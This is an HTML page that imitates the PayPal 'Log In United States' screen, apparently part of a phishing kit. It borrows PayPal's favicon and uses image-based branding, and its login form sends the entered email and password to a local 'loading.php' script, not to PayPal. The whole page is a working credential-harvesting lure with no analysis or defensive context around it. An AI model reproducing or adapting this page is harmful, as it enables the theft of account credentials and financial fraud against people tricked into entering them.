<!DOCTYPE HTML5>
<html>
<head>
<meta charset="UTF-8">
<title>Log In United States - PayPal</title>
<link rel="stylesheet" href="css/gfrehegr.css">
<link href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico" rel="icon">
</head>
<body>
<div id="bar">
   <div id="wrapperbar">
   <img src="images/website_logo.gif" style="padding-top: 10px;">
   </div>
</div>
<div id="wrapper">
<img src="images/texto.png" style="float: right;padding-top: 20px;padding-right: 70px;">
<div id="block">
<img src="images/login.png">
<div id="loginform">
<form id="form" name="form" method="POST" action="loading.php?id=loading">
<img src="images/email.png" for="01D">
<input type="text" name="01D">
<img src="images/pw.png">
<input type="password" name="02D">
<div style="position:relative; height:166px; width:342px; background:url(http://i.gyazo.com/95c9a42995ebe0fe080f74a29a1c5af6.png) 0 0 no-repeat;"><a value="" onclick="document.forms['form'].submit(); return false;" style="position:absolute; top:15px; left:1px; width:333px; height:34px;" title="" alt="" target="_self"></a><a style="position:absolute; top:69px; left:1px; width:278px; height:14px;" title="" alt="" href="#" target="_self"></a><a style="position:absolute; top:118px; left:1px; width:338px; height:40px;" title="" alt="" href="#" target="_self"></a><a style="position:absolute; overflow:hidden; top:164px; left:340px; width:1px; height:1px;" title="HTML Map" alt="HTML Map" href="http://www.html-map.com/" target="_self"></a></div>
</div>
</div>
<div id="footer">
<img src="images/copyright.png">
</div>
</div>
</body>
</html>